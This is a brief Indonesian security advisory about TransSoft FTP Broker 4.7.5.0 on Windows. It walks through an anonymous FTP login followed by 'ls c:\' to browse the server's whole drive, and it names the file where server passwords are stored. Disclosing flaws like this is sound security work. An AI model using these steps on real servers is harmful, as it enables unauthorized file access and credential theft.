Broker FTP memungkinkan pengguna untuk menjelajahi direktori file

Broker FTP buatan TransSoft versi 4.7.5.0, yang berjalan di atas Windows, memiliki kerentanan yang memungkinkan untuk melakukan browsing direktori dan juga pembajakan password. Kerentanan ini sangat berbahaya, dan telah ditemukan oleh kelompok keamanan 403 pada tanggal 7 November 2000 dan dipublikasikan pada tanggal 24 November 2000.

Sebagai contoh, Anda dapat melakukan browsing melalui server FTP TransSoft dengan langkah-langkah berikut:
1. Telnet ke 127.0.0.1
2. Terhubung ke 127.0.0.1.
3. 220 FTP Server siap [***]
4. User (127.0.0.1:(none)): anonymous
5. 331 Password diperlukan untuk anonymous.
6. Password: test@test
7. 230 Pengguna anonymous berhasil login.
8. ftp> ls c:\

Dengan perintah di atas, Anda dapat melakukan browsing ke drive c:\. Sangat sederhana, bukan?

Catatan: Password pada server FTP ini disimpan di %%WinDir%%\BrokerProfiles.Dat